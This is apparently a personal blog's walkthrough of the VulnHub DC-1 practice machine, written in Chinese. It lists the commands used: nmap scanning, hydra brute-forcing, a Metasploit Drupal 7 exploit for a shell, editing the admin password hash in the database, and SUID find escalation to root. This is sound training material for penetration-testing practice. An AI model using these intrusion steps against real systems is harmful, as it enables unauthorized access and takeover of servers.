vulnub-dc-1

vulnhub的第二个靶机

靶机地址: https://www.vulnhub.com/entry/dc-1,292/.

知识点

nmap

用nmap扫描局域网内存活的主机，发现靶机的ip

nmap 192.168.88.0/24 -T4

用nmap进行更加详细的扫描，发现靶机开了以下的几个端口

nmap 192.168.88.137 -T4 -A -sV -p-

durpalCMS

端口：22 ——>爆破 ——>未成功

hydra -l root -P rockyou.txt 192.168.88.137 ssh

端口：80 ——>web漏洞——>成功

指纹识别,是drupal 7

扫描目录，得到后台地址和robots.txt文件，但爆破后台失败，发现无可利用的点。

./dirsearch.py --url http://192.168.88.137 -e php

Metasploit

把思路转向Metasploit,在kali中寻找该CMS的版本漏洞,因exp太多，不知道该用哪一个所以在msf中查找一下，把范围缩小

searchsploit drupal 7

search drupal

在这里我们用第四个exp，成功拿到shell(一个一个试)

shell
python -c "import pty;pty.spawn('/bin/bash')"

得到一个交互式的shell，在www目录下找到第一个flag，也提示了下一个flag和配置文件有关

百度可知drupal的数据库配置文件路径，也在数据库配置文件中拿到了第二个flag和一对帐号密码
dbuser:R0ck3t

百度可知drupal的数据库配置文件路径

数据库改密

用已知的数据库帐号密码进行登录，修改网站管理员的密码，达到登录后台的方法。
drupal的hash加密方法参考以下链接： drupalchina.cn/node/2128.

password: password hash:

update users set update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4'  where name='admin';

用admin：password登录后台，在content左下角发现第三个flag

根据提示查看当前主机的用户，发现只有一个用户flag4,试着爆破一下，发现爆破成功。
用户名密码lag4：orange。登录到主机发现第四个flag，通过第四个flag知道最后一个flag在root目录下，也就是要拿到root权限。

suid之find提权

寻找可提权的信息，没有sudo也没有定时任务，但找到了find的suid权限，可通过find提权至root。

find / -type f -perm -u=s 2>/dev/null

touch 1
find 1 -exec "/bin/sh" \; 

至此五个flag已经全部拿到。

ps：

个人站点博客：XingHe，欢迎来踩~